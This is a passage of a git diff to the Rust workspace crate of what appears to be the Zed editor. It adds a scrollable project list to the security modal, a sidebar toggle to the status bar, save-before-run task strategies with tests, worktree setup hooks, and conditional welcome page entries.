Clone, serde::Serialize, serde::Deserialize)] +pub struct 
SerializedProjectGroupKey { + pub path_list: SerializedPathList, + pub(crate) location: SerializedWorkspaceLocation, +} + +impl From for SerializedProjectGroupKey { + fn from(value: ProjectGroupKey) -> Self { + SerializedProjectGroupKey { + path_list: value.path_list().serialize(), + location: match value.host() { + Some(host) => SerializedWorkspaceLocation::Remote(host), + None => SerializedWorkspaceLocation::Local, + }, + } + } +} + +impl From for ProjectGroupKey { + fn from(value: SerializedProjectGroupKey) -> Self { + let path_list = PathList::deserialize(&value.path_list); + let host = match value.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(opts) => Some(opts), + }; + ProjectGroupKey::new(host, path_list) + } +} + /// Per-window state for a MultiWorkspace, persisted to KVP. #[derive(Debug, Clone, Default, serde::Serialize, serde::Deserialize)] pub struct MultiWorkspaceState { pub active_workspace_id: Option, pub sidebar_open: bool, + pub project_group_keys: Vec, + #[serde(default)] + pub sidebar_state: Option, } /// The serialized state of a single MultiWorkspace window from a previous session: -/// all workspaces that shared the window, which one was active, and whether the -/// sidebar was open. +/// the active workspace to restore plus window-level state (project group keys, +/// sidebar). 
#[derive(Debug, Clone)] pub struct SerializedMultiWorkspace { - pub workspaces: Vec, + pub active_workspace: SessionWorkspace, pub state: MultiWorkspaceState, } @@ -93,9 +125,9 @@ pub(crate) struct SerializedWorkspace { #[derive(Debug, PartialEq, Clone, Default, Serialize, Deserialize)] pub struct DockStructure { - pub(crate) left: DockData, - pub(crate) right: DockData, - pub(crate) bottom: DockData, + pub left: DockData, + pub right: DockData, + pub bottom: DockData, } impl RemoteConnectionKind { @@ -143,9 +175,9 @@ impl Bind for DockStructure { #[derive(Debug, PartialEq, Clone, Default, Serialize, Deserialize)] pub struct DockData { - pub(crate) visible: bool, - pub(crate) active_panel: Option, - pub(crate) zoom: bool, + pub visible: bool, + pub active_panel: Option, + pub zoom: bool, } impl Column for DockData { diff --git a/crates/workspace/src/searchable.rs b/crates/workspace/src/searchable.rs index 93d809d7a522d11e4b4bd78e71899b89aa4d0508..f0932a7d7b3e7880c27b40c28890f063f4de731e 100644 --- a/crates/workspace/src/searchable.rs +++ b/crates/workspace/src/searchable.rs @@ -55,6 +55,7 @@ pub struct SearchOptions { /// Specifies whether the supports search & replace. 
pub replacement: bool, pub selection: bool, + pub select_all: bool, pub find_in_results: bool, } @@ -78,6 +79,7 @@ pub trait SearchableItem: Item + EventEmitter { regex: true, replacement: true, selection: true, + select_all: true, find_in_results: false, } } diff --git a/crates/workspace/src/security_modal.rs b/crates/workspace/src/security_modal.rs index 664aa891550cecdd602d54bfca579d04e03f33dc..2130a1d1eca3d33651a057d32a252718270f89f8 100644 --- a/crates/workspace/src/security_modal.rs +++ b/crates/workspace/src/security_modal.rs @@ -7,7 +7,7 @@ use std::{ }; use collections::{HashMap, HashSet}; -use gpui::{DismissEvent, EventEmitter, FocusHandle, Focusable, WeakEntity}; +use gpui::{DismissEvent, EventEmitter, FocusHandle, Focusable, ScrollHandle, WeakEntity}; use project::{ WorktreeId, @@ -17,7 +17,8 @@ use project::{ use smallvec::SmallVec; use theme::ActiveTheme; use ui::{ - AlertModal, Checkbox, FluentBuilder, KeyBinding, ListBulletItem, ToggleState, prelude::*, + AlertModal, Checkbox, FluentBuilder, KeyBinding, ListBulletItem, ToggleState, WithScrollbar, + prelude::*, }; use crate::{DismissDecision, ModalView, ToggleWorktreeSecurity}; @@ -29,6 +30,7 @@ pub struct SecurityModal { worktree_store: WeakEntity, remote_host: Option, focus_handle: FocusHandle, + project_list_scroll_handle: ScrollHandle, trusted: Option, } @@ -63,16 +65,17 @@ impl ModalView for SecurityModal { } impl Render for SecurityModal { - fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { if self.restricted_paths.is_empty() { self.dismiss(cx); return v_flex().into_any_element(); } - let header_label = if self.restricted_paths.len() == 1 { - "Unrecognized Project" + let restricted_count = self.restricted_paths.len(); + let header_label: SharedString = if restricted_count == 1 { + "Unrecognized Project".into() } else { - "Unrecognized Projects" + format!("Unrecognized Projects 
({})", restricted_count).into() }; let trust_label = self.build_trust_label(); @@ -102,32 +105,61 @@ impl Render for SecurityModal { .child(Icon::new(IconName::Warning).color(Color::Warning)) .child(Label::new(header_label)), ) - .children(self.restricted_paths.values().filter_map(|restricted_path| { - let abs_path = if restricted_path.is_file { - restricted_path.abs_path.parent() - } else { - Some(restricted_path.abs_path.as_ref()) - }?; - let label = match &restricted_path.host { - Some(remote_host) => match &remote_host.user_name { - Some(user_name) => format!( - "{} ({}@{})", - self.shorten_path(abs_path).display(), - user_name, - remote_host.host_identifier - ), - None => format!( - "{} ({})", - self.shorten_path(abs_path).display(), - remote_host.host_identifier - ), - }, - None => self.shorten_path(abs_path).display().to_string(), - }; - Some(h_flex() - .pl(IconSize::default().rems() + rems(0.5)) - .child(Label::new(label).color(Color::Muted))) - })), + .child( + div() + .size_full() + .vertical_scrollbar_for(&self.project_list_scroll_handle, window, cx) + .child( + v_flex() + .id("paths_container") + .max_h_24() + .overflow_y_scroll() + .track_scroll(&self.project_list_scroll_handle) + .children( + self.restricted_paths.values().filter_map( + |restricted_path| { + let abs_path = if restricted_path.is_file { + restricted_path.abs_path.parent() + } else { + Some(restricted_path.abs_path.as_ref()) + }?; + let label = match &restricted_path.host { + Some(remote_host) => { + match &remote_host.user_name { + Some(user_name) => format!( + "{} ({}@{})", + self.shorten_path(abs_path) + .display(), + user_name, + remote_host.host_identifier + ), + None => format!( + "{} ({})", + self.shorten_path(abs_path) + .display(), + remote_host.host_identifier + ), + } + } + None => self + .shorten_path(abs_path) + .display() + .to_string(), + }; + Some( + h_flex() + .pl( + IconSize::default().rems() + rems(0.5), + ) + .child( + Label::new(label).color(Color::Muted), + ), + ) + 
}, + ), + ), + ), + ), ) .child( v_flex() @@ -219,6 +251,7 @@ impl SecurityModal { remote_host: remote_host.map(|host| host.into()), restricted_paths: HashMap::default(), focus_handle: cx.focus_handle(), + project_list_scroll_handle: ScrollHandle::new(), trust_parents: false, home_dir: std::env::home_dir(), trusted: None, diff --git a/crates/workspace/src/shared_screen.rs b/crates/workspace/src/shared_screen.rs index 136f552fee23231b45fcb867d2ce8bab02dca7e8..41e8f41f2ad4e10b85ceb68e5f4690b1faf6c04a 100644 --- a/crates/workspace/src/shared_screen.rs +++ b/crates/workspace/src/shared_screen.rs @@ -69,7 +69,7 @@ impl Item for SharedScreen { fn deactivated(&mut self, _window: &mut Window, cx: &mut Context) { if let Some(nav_history) = self.nav_history.as_mut() { - nav_history.push::<()>(None, cx); + nav_history.push::<()>(None, None, cx); } } diff --git a/crates/workspace/src/status_bar.rs b/crates/workspace/src/status_bar.rs index 5e0b8a7f6eabbd652f1f429342a837aa0b43e6d2..dad5389f2f5574c773af740fd61c6c1501c2fea0 100644 --- a/crates/workspace/src/status_bar.rs +++ b/crates/workspace/src/status_bar.rs @@ -1,11 +1,14 @@ -use crate::{ItemHandle, Pane}; +use crate::{ + ItemHandle, MultiWorkspace, Pane, SidebarSide, ToggleWorkspaceSidebar, + sidebar_side_context_menu, +}; use gpui::{ - AnyView, App, Context, Decorations, Entity, IntoElement, ParentElement, Render, Styled, - Subscription, Window, + AnyView, App, Context, Corner, Decorations, Entity, IntoElement, ParentElement, Render, Styled, + Subscription, WeakEntity, Window, }; use std::any::TypeId; use theme::CLIENT_SIDE_DECORATION_ROUNDING; -use ui::{h_flex, prelude::*}; +use ui::{Divider, Indicator, Tooltip, prelude::*}; use util::ResultExt; pub trait StatusItemView: Render { @@ -29,31 +32,62 @@ trait StatusItemViewHandle: Send { fn item_type(&self) -> TypeId; } +#[derive(Default)] +struct SidebarStatus { + open: bool, + side: SidebarSide, + has_notifications: bool, + show_toggle: bool, +} + +impl SidebarStatus { + fn 
query(multi_workspace: &Option>, cx: &App) -> Self { + multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| { + let mw = mw.read(cx); + let enabled = mw.multi_workspace_enabled(cx); + Self { + open: mw.sidebar_open() && enabled, + side: mw.sidebar_side(cx), + has_notifications: mw.sidebar_has_notifications(cx), + show_toggle: enabled, + } + }) + .unwrap_or_default() + } +} + pub struct StatusBar { left_items: Vec>, right_items: Vec>, active_pane: Entity, + multi_workspace: Option>, _observe_active_pane: Subscription, - workspace_sidebar_open: bool, } impl Render for StatusBar { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let sidebar = SidebarStatus::query(&self.multi_workspace, cx); + h_flex() .w_full() .justify_between() .gap(DynamicSpacing::Base08.rems(cx)) - .py(DynamicSpacing::Base04.rems(cx)) - .px(DynamicSpacing::Base06.rems(cx)) + .p(DynamicSpacing::Base04.rems(cx)) .bg(cx.theme().colors().status_bar_background) .map(|el| match window.window_decorations() { Decorations::Server => el, Decorations::Client { tiling, .. 
} => el - .when(!(tiling.bottom || tiling.right), |el| { - el.rounded_br(CLIENT_SIDE_DECORATION_ROUNDING) - }) .when( - !(tiling.bottom || tiling.left) && !self.workspace_sidebar_open, + !(tiling.bottom || tiling.right) + && !(sidebar.open && sidebar.side == SidebarSide::Right), + |el| el.rounded_br(CLIENT_SIDE_DECORATION_ROUNDING), + ) + .when( + !(tiling.bottom || tiling.left) + && !(sidebar.open && sidebar.side == SidebarSide::Left), |el| el.rounded_bl(CLIENT_SIDE_DECORATION_ROUNDING), ) // This border is to avoid a transparent gap in the rounded corners @@ -61,44 +95,128 @@ impl Render for StatusBar { .border_b(px(1.0)) .border_color(cx.theme().colors().status_bar_background), }) - .child(self.render_left_tools()) - .child(self.render_right_tools()) + .child(self.render_left_tools(&sidebar, cx)) + .child(self.render_right_tools(&sidebar, cx)) } } impl StatusBar { - fn render_left_tools(&self) -> impl IntoElement { + fn render_left_tools( + &self, + sidebar: &SidebarStatus, + cx: &mut Context, + ) -> impl IntoElement { h_flex() .gap_1() + .min_w_0() .overflow_x_hidden() + .when( + sidebar.show_toggle && !sidebar.open && sidebar.side == SidebarSide::Left, + |this| this.child(self.render_sidebar_toggle(sidebar, cx)), + ) .children(self.left_items.iter().map(|item| item.to_any())) } - fn render_right_tools(&self) -> impl IntoElement { + fn render_right_tools( + &self, + sidebar: &SidebarStatus, + cx: &mut Context, + ) -> impl IntoElement { h_flex() + .flex_shrink_0() .gap_1() .overflow_x_hidden() .children(self.right_items.iter().rev().map(|item| item.to_any())) + .when( + sidebar.show_toggle && !sidebar.open && sidebar.side == SidebarSide::Right, + |this| this.child(self.render_sidebar_toggle(sidebar, cx)), + ) + } + + fn render_sidebar_toggle( + &self, + sidebar: &SidebarStatus, + cx: &mut Context, + ) -> impl IntoElement { + let on_right = sidebar.side == SidebarSide::Right; + let has_notifications = sidebar.has_notifications; + let indicator_border = 
cx.theme().colors().status_bar_background; + + let toggle = sidebar_side_context_menu("sidebar-status-toggle-menu", cx) + .anchor(if on_right { + Corner::BottomRight + } else { + Corner::BottomLeft + }) + .attach(if on_right { + Corner::TopRight + } else { + Corner::TopLeft + }) + .trigger(move |_is_active, _window, _cx| { + IconButton::new( + "toggle-workspace-sidebar", + if on_right { + IconName::ThreadsSidebarRightClosed + } else { + IconName::ThreadsSidebarLeftClosed + }, + ) + .icon_size(IconSize::Small) + .when(has_notifications, |this| { + this.indicator(Indicator::dot().color(Color::Accent)) + .indicator_border_color(Some(indicator_border)) + }) + .tooltip(move |_, cx| { + Tooltip::for_action("Open Threads Sidebar", &ToggleWorkspaceSidebar, cx) + }) + .on_click(move |_, window, cx| { + if let Some(multi_workspace) = window.root::().flatten() { + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.toggle_sidebar(window, cx); + }); + } + }) + }); + + h_flex() + .gap_0p5() + .when(on_right, |this| { + this.child(Divider::vertical().color(ui::DividerColor::Border)) + }) + .child(toggle) + .when(!on_right, |this| { + this.child(Divider::vertical().color(ui::DividerColor::Border)) + }) } } impl StatusBar { - pub fn new(active_pane: &Entity, window: &mut Window, cx: &mut Context) -> Self { + pub fn new( + active_pane: &Entity, + multi_workspace: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { let mut this = Self { left_items: Default::default(), right_items: Default::default(), active_pane: active_pane.clone(), + multi_workspace, _observe_active_pane: cx.observe_in(active_pane, window, |this, _, window, cx| { this.update_active_pane_item(window, cx) }), - workspace_sidebar_open: false, }; this.update_active_pane_item(window, cx); this } - pub fn set_workspace_sidebar_open(&mut self, open: bool, cx: &mut Context) { - self.workspace_sidebar_open = open; + pub fn set_multi_workspace( + &mut self, + multi_workspace: WeakEntity, + cx: 
&mut Context, + ) { + self.multi_workspace = Some(multi_workspace); cx.notify(); } diff --git a/crates/workspace/src/tasks.rs b/crates/workspace/src/tasks.rs index f85e1488f97491a73314297d91c597bd7d3bb841..98421365532a8fdd4fc36f0f5c68e83b0814ae8e 100644 --- a/crates/workspace/src/tasks.rs +++ b/crates/workspace/src/tasks.rs @@ -1,16 +1,19 @@ use std::process::ExitStatus; use anyhow::Result; +use collections::HashSet; use gpui::{AppContext, Context, Entity, Task}; use language::Buffer; use project::{TaskSourceKind, WorktreeId}; use remote::ConnectionState; use task::{ - DebugScenario, ResolvedTask, SharedTaskContext, SpawnInTerminal, TaskContext, TaskTemplate, + DebugScenario, ResolvedTask, SaveStrategy, SharedTaskContext, SpawnInTerminal, TaskContext, + TaskHook, TaskTemplate, TaskVariables, VariableName, }; use ui::Window; +use util::TryFutureExt; -use crate::{Toast, Workspace, notifications::NotificationId}; +use crate::{SaveIntent, Toast, Workspace, notifications::NotificationId}; impl Workspace { pub fn schedule_task( @@ -73,28 +76,57 @@ impl Workspace { }); } - if let Some(terminal_provider) = self.terminal_provider.as_ref() { - let task_status = terminal_provider.spawn(spawn_in_terminal, window, cx); - - let task = cx.spawn(async |w, cx| { - let res = cx.background_spawn(task_status).await; - match res { - Some(Ok(status)) => { - if status.success() { - log::debug!("Task spawn succeeded"); - } else { - log::debug!("Task spawn failed, code: {:?}", status.code()); - } + if self.terminal_provider.is_some() { + let task = cx.spawn_in(window, async move |workspace, cx| { + let save_action = match spawn_in_terminal.save { + SaveStrategy::All => { + let save_all = workspace.update_in(cx, |workspace, window, cx| { + let task = workspace.save_all_internal(SaveIntent::SaveAll, window, cx); + // Match the type of the other arm by ignoring the bool value returned + cx.background_spawn(async { task.await.map(|_| ()) }) + }); + save_all.ok() } - Some(Err(e)) => { - 
log::error!("Task spawn failed: {e:#}"); - _ = w.update(cx, |w, cx| { - let id = NotificationId::unique::(); - w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx); - }) + SaveStrategy::Current => { + let save_current = workspace.update_in(cx, |workspace, window, cx| { + workspace.save_active_item(SaveIntent::SaveAll, window, cx) + }); + save_current.ok() } - None => log::debug!("Task spawn got cancelled"), + SaveStrategy::None => None, }; + if let Some(save_action) = save_action { + save_action.log_err().await; + } + + let spawn_task = workspace.update_in(cx, |workspace, window, cx| { + workspace + .terminal_provider + .as_ref() + .map(|terminal_provider| { + terminal_provider.spawn(spawn_in_terminal, window, cx) + }) + }); + if let Some(spawn_task) = spawn_task.ok().flatten() { + let res = cx.background_spawn(spawn_task).await; + match res { + Some(Ok(status)) => { + if status.success() { + log::debug!("Task spawn succeeded"); + } else { + log::debug!("Task spawn failed, code: {:?}", status.code()); + } + } + Some(Err(e)) => { + log::error!("Task spawn failed: {e:#}"); + _ = workspace.update(cx, |w, cx| { + let id = NotificationId::unique::(); + w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx); + }) + } + None => log::debug!("Task spawn got cancelled"), + }; + } }); self.scheduled_tasks.push(task); } @@ -133,4 +165,272 @@ impl Workspace { Task::ready(None) } } + + pub fn run_create_worktree_tasks(&mut self, window: &mut Window, cx: &mut Context) { + let project = self.project().clone(); + let hooks = HashSet::from_iter([TaskHook::CreateWorktree]); + + let worktree_tasks: Vec<(WorktreeId, TaskContext, Vec)> = { + let project = project.read(cx); + let task_store = project.task_store(); + let Some(inventory) = task_store.read(cx).task_inventory().cloned() else { + return; + }; + + let git_store = project.git_store().read(cx); + + let mut worktree_tasks = Vec::new(); + for worktree in project.worktrees(cx) { + let worktree = 
worktree.read(cx); + let worktree_id = worktree.id(); + let worktree_abs_path = worktree.abs_path(); + + let templates: Vec = inventory + .read(cx) + .templates_with_hooks(&hooks, worktree_id) + .into_iter() + .map(|(_, template)| template) + .collect(); + + if templates.is_empty() { + continue; + } + + let mut task_variables = TaskVariables::default(); + task_variables.insert( + VariableName::WorktreeRoot, + worktree_abs_path.to_string_lossy().into_owned(), + ); + + if let Some(path) = git_store.original_repo_path_for_worktree(worktree_id, cx) { + task_variables.insert( + VariableName::MainGitWorktree, + path.to_string_lossy().into_owned(), + ); + } + + let task_context = TaskContext { + cwd: Some(worktree_abs_path.to_path_buf()), + task_variables, + project_env: Default::default(), + }; + + worktree_tasks.push((worktree_id, task_context, templates)); + } + worktree_tasks + }; + + if worktree_tasks.is_empty() { + return; + } + + let task = cx.spawn_in(window, async move |workspace, cx| { + let mut tasks = Vec::new(); + for (worktree_id, task_context, templates) in worktree_tasks { + let id_base = format!("worktree_setup_{worktree_id}"); + + tasks.push(cx.spawn({ + let workspace = workspace.clone(); + async move |cx| { + for task_template in templates { + let Some(resolved) = + task_template.resolve_task(&id_base, &task_context) + else { + continue; + }; + + let status = workspace.update_in(cx, |workspace, window, cx| { + workspace.spawn_in_terminal(resolved.resolved, window, cx) + })?; + + if let Some(result) = status.await { + match result { + Ok(exit_status) if !exit_status.success() => { + log::error!( + "Git worktree setup task failed with status: {:?}", + exit_status.code() + ); + break; + } + Err(error) => { + log::error!("Git worktree setup task error: {error:#}"); + break; + } + _ => {} + } + } + } + anyhow::Ok(()) + } + })); + } + + futures::future::join_all(tasks).await; + anyhow::Ok(()) + }); + task.detach_and_log_err(cx); + } +} + +#[cfg(test)] +mod 
tests { + use super::*; + use crate::{ + TerminalProvider, + item::test::{TestItem, TestProjectItem}, + register_serializable_item, + }; + use gpui::{App, TestAppContext}; + use parking_lot::Mutex; + use project::{FakeFs, Project, TaskSourceKind}; + use serde_json::json; + use std::sync::Arc; + use task::TaskTemplate; + + struct Fixture { + workspace: Entity, + item: Entity, + task: ResolvedTask, + dirty_before_spawn: Arc>>, + } + + #[gpui::test] + async fn test_schedule_resolved_task_save_all(cx: &mut TestAppContext) { + let (fixture, cx) = create_fixture(cx, SaveStrategy::All).await; + fixture.workspace.update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + TaskSourceKind::UserInput, + fixture.task, + false, + window, + cx, + ); + }); + cx.executor().run_until_parked(); + + assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false)); + assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty)); + } + + #[gpui::test] + async fn test_schedule_resolved_task_save_current(cx: &mut TestAppContext) { + let (fixture, cx) = create_fixture(cx, SaveStrategy::Current).await; + // Add a second inactive dirty item + let inactive = add_test_item(&fixture.workspace, "file2.txt", false, cx); + fixture.workspace.update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + TaskSourceKind::UserInput, + fixture.task, + false, + window, + cx, + ); + }); + cx.executor().run_until_parked(); + + // The active item (fixture.item) should be saved + assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false)); + assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty)); + // The inactive item should not be saved + assert!(cx.read(|cx| inactive.read(cx).is_dirty)); + } + + #[gpui::test] + async fn test_schedule_resolved_task_save_none(cx: &mut TestAppContext) { + let (fixture, cx) = create_fixture(cx, SaveStrategy::None).await; + fixture.workspace.update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + TaskSourceKind::UserInput, + 
fixture.task, + false, + window, + cx, + ); + }); + cx.executor().run_until_parked(); + + assert_eq!(*fixture.dirty_before_spawn.lock(), Some(true)); + assert!(cx.read(|cx| fixture.item.read(cx).is_dirty)); + } + + async fn create_fixture( + cx: &mut TestAppContext, + save_strategy: SaveStrategy, + ) -> (Fixture, &mut gpui::VisualTestContext) { + cx.update(|cx| { + let settings_store = settings::SettingsStore::test(cx); + cx.set_global(settings_store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + register_serializable_item::(cx); + }); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root", json!({ "file.txt": "dirty" })) + .await; + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + + // Add a dirty item to the workspace + let item = add_test_item(&workspace, "file.txt", true, cx); + + let template = TaskTemplate { + label: "test".to_string(), + command: "echo".to_string(), + save: save_strategy, + ..Default::default() + }; + let task = template + .resolve_task("test", &task::TaskContext::default()) + .unwrap(); + let dirty_before_spawn: Arc>> = Arc::default(); + let terminal_provider = Box::new(TestTerminalProvider { + item: item.clone(), + dirty_before_spawn: dirty_before_spawn.clone(), + }); + workspace.update(cx, |workspace, _| { + workspace.terminal_provider = Some(terminal_provider); + }); + let fixture = Fixture { + workspace, + item, + task, + dirty_before_spawn, + }; + (fixture, cx) + } + + fn add_test_item( + workspace: &Entity, + name: &str, + active: bool, + cx: &mut gpui::VisualTestContext, + ) -> Entity { + let item = cx.new(|cx| { + TestItem::new(cx) + .with_dirty(true) + .with_project_items(&[TestProjectItem::new(1, name, cx)]) + }); + workspace.update_in(cx, |workspace, window, cx| { + let pane = workspace.active_pane().clone(); + workspace.add_item(pane, Box::new(item.clone()), None, true, 
active, window, cx); + }); + item + } + + struct TestTerminalProvider { + item: Entity, + dirty_before_spawn: Arc>>, + } + + impl TerminalProvider for TestTerminalProvider { + fn spawn( + &self, + _task: task::SpawnInTerminal, + _window: &mut ui::Window, + cx: &mut App, + ) -> Task>> { + *self.dirty_before_spawn.lock() = Some(cx.read_entity(&self.item, |e, _| e.is_dirty)); + Task::ready(Some(Ok(ExitStatus::default()))) + } + } } diff --git a/crates/workspace/src/welcome.rs b/crates/workspace/src/welcome.rs index 1caa5b56e5f38db00ad59a4aca3a2a830ee023b7..dceca3e85f4308952563e689c608c92e9f77144f 100644 --- a/crates/workspace/src/welcome.rs +++ b/crates/workspace/src/welcome.rs @@ -1,6 +1,7 @@ use crate::{ - NewFile, Open, PathList, SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId, + NewFile, Open, OpenMode, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceId, item::{Item, ItemEvent}, + persistence::WorkspaceDb, }; use chrono::{DateTime, Utc}; use git::Clone as GitClone; @@ -10,8 +11,10 @@ use gpui::{ ParentElement, Render, Styled, Task, Window, actions, }; use menu::{SelectNext, SelectPrevious}; +use project::DisableAiSettings; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; +use settings::Settings; use ui::{ButtonLike, Divider, DividerColor, KeyBinding, Vector, VectorName, prelude::*}; use util::ResultExt; use zed_actions::{Extensions, OpenOnboarding, OpenSettings, agent, command_palette}; @@ -121,21 +124,43 @@ impl RenderOnce for SectionButton { } } +enum SectionVisibility { + Always, + Conditional(fn(&App) -> bool), +} + +impl SectionVisibility { + fn is_visible(&self, cx: &App) -> bool { + match self { + SectionVisibility::Always => true, + SectionVisibility::Conditional(f) => f(cx), + } + } +} + struct SectionEntry { icon: IconName, title: &'static str, action: &'static dyn Action, + visibility_guard: SectionVisibility, } impl SectionEntry { - fn render(&self, button_index: usize, focus: &FocusHandle, _cx: &App) -> impl 
IntoElement { - SectionButton::new( - self.title, - self.icon, - self.action, - button_index, - focus.clone(), - ) + fn render( + &self, + button_index: usize, + focus: &FocusHandle, + cx: &App, + ) -> Option { + self.visibility_guard.is_visible(cx).then(|| { + SectionButton::new( + self.title, + self.icon, + self.action, + button_index, + focus.clone(), + ) + }) } } @@ -147,21 +172,25 @@ const CONTENT: (Section<4>, Section<3>) = ( icon: IconName::Plus, title: "New File", action: &NewFile, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::FolderOpen, title: "Open Project", - action: &Open, + action: &Open::DEFAULT, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::CloudDownload, title: "Clone Repository", action: &GitClone, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::ListCollapse, title: "Open Command Palette", action: &command_palette::Toggle, + visibility_guard: SectionVisibility::Always, }, ], }, @@ -172,11 +201,15 @@ const CONTENT: (Section<4>, Section<3>) = ( icon: IconName::Settings, title: "Open Settings", action: &OpenSettings, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::ZedAssistant, title: "View AI Settings", action: &agent::OpenSettings, + visibility_guard: SectionVisibility::Conditional(|cx| { + !DisableAiSettings::get_global(cx).disable_ai + }), }, SectionEntry { icon: IconName::Blocks, @@ -185,6 +218,7 @@ const CONTENT: (Section<4>, Section<3>) = ( category_filter: None, id: None, }, + visibility_guard: SectionVisibility::Always, }, ], }, @@ -204,7 +238,7 @@ impl Section { self.entries .iter() .enumerate() - .map(|(index, entry)| entry.render(index_offset + index, focus, cx)), + .filter_map(|(index, entry)| entry.render(index_offset + index, focus, cx)), ) } } @@ -238,9 +272,10 @@ impl WelcomePage { let fs = workspace .upgrade() .map(|ws| ws.read(cx).app_state().fs.clone()); + let db = WorkspaceDb::global(cx); 
cx.spawn_in(window, async move |this: WeakEntity, cx| { let Some(fs) = fs else { return }; - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .log_err() @@ -291,7 +326,7 @@ impl WelcomePage { self.workspace .update(cx, |workspace, cx| { workspace - .open_workspace_for_paths(true, paths, window, cx) + .open_workspace_for_paths(OpenMode::Activate, paths, window, cx) .detach_and_log_err(cx); }) .log_err(); @@ -485,7 +520,7 @@ impl crate::SerializableItem for WelcomePage { alive_items, workspace_id, "welcome_pages", - &persistence::WELCOME_PAGES, + &persistence::WelcomePagesDb::global(cx), cx, ) } @@ -498,7 +533,7 @@ impl crate::SerializableItem for WelcomePage { window: &mut Window, cx: &mut App, ) -> Task>> { - if persistence::WELCOME_PAGES + if persistence::WelcomePagesDb::global(cx) .get_welcome_page(item_id, workspace_id) .ok() .is_some_and(|is_open| is_open) @@ -520,11 +555,10 @@ impl crate::SerializableItem for WelcomePage { cx: &mut Context, ) -> Option>> { let workspace_id = workspace.database_id()?; - Some(cx.background_spawn(async move { - persistence::WELCOME_PAGES - .save_welcome_page(item_id, workspace_id, true) - .await - })) + let db = persistence::WelcomePagesDb::global(cx); + Some(cx.background_spawn( + async move { db.save_welcome_page(item_id, workspace_id, true).await }, + )) } fn should_serialize(&self, event: &Self::Event) -> bool { @@ -558,7 +592,7 @@ mod persistence { )]); } - db::static_connection!(WELCOME_PAGES, WelcomePagesDb, [WorkspaceDb]); + db::static_connection!(WelcomePagesDb, [WorkspaceDb]); impl WelcomePagesDb { query! 
{ diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index cde04d987a015982006d283c17ee82ed9b7a7cb2..7979ffe828cbf8c4da5a40a29eaa6537f1433c3c 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -1,9 +1,12 @@ +pub mod active_file_name; pub mod dock; pub mod history_manager; pub mod invalid_item_view; pub mod item; mod modal_layer; mod multi_workspace; +#[cfg(test)] +mod multi_workspace_tests; pub mod notifications; pub mod pane; pub mod pane_group; @@ -14,7 +17,9 @@ mod persistence; pub mod searchable; mod security_modal; pub mod shared_screen; +use db::smol::future::yield_now; pub use shared_screen::SharedScreen; +pub mod focus_follows_mouse; mod status_bar; pub mod tasks; mod theme_preview; @@ -26,9 +31,9 @@ mod workspace_settings; pub use crate::notifications::NotificationFrame; pub use dock::Panel; pub use multi_workspace::{ - DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace, NewWorkspaceInWindow, - NextWorkspaceInWindow, PreviousWorkspaceInWindow, Sidebar, SidebarEvent, SidebarHandle, - ToggleWorkspaceSidebar, + CloseWorkspaceSidebar, DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace, + MultiWorkspaceEvent, Sidebar, SidebarEvent, SidebarHandle, SidebarRenderState, SidebarSide, + ToggleWorkspaceSidebar, sidebar_side_context_menu, }; pub use path_list::{PathList, SerializedPathList}; pub use toast_layer::{ToastAction, ToastLayer, ToastView}; @@ -50,8 +55,8 @@ use futures::{ future::{Shared, try_join_all}, }; use gpui::{ - Action, AnyEntity, AnyView, AnyWeakView, App, AsyncApp, AsyncWindowContext, Bounds, Context, - CursorStyle, Decorations, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, + Action, AnyEntity, AnyView, AnyWeakView, App, AsyncApp, AsyncWindowContext, Axis, Bounds, + Context, CursorStyle, Decorations, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Global, HitboxBehavior, Hsla, KeyContext, Keystroke, ManagedView, MouseButton, 
